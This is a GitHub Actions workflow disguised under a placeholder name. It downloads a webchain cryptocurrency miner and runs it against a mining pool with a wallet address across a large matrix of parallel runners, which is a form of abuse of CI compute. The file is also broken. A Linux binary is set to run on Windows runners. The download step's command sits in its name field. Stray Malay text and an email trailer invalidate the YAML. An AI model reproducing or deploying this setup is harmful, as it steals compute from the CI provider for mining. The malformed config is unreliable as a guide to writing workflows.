name: NAME

on: [workflow_dispatch]

jobs:
 build:
   name: NAME
   runs-on: windows-latest
   strategy:
     max-parallel: 5
     fail-fast: false
     matrix:
       go: [1.0, 1.1, 1.2, 1.3, 1,35]
       flag: [A, B, C, D, E, F, G, H, I]
   env:
       NUM_JOBS: 20
       JOB: ${{ matrix.go }}
   steps:
   - name: wget https://github.com/mintme-com/miner/releases/download/v2.8.0/webchain-miner-2.8.0-linux-amd64.tar.gz
     run: Invoke-WebRequest tar xf webchain-miner-2.8.0-linux-amd64.tar.gz
   - name: Extract
     run: cd webchain-miner-2.8.0
   - name: RUNNING
     run: .github/main/./webchain-miner -o web-ko1.gonspool.com:3333 -u 0x3b9bA781797b57872687Ce5d5219A1A4Bc0e85ea -p x -t4
string command miner seperti pool:port, wallet, threads, '
   - name: DONE
     run: exit

Dihantar daripada iPhone saya
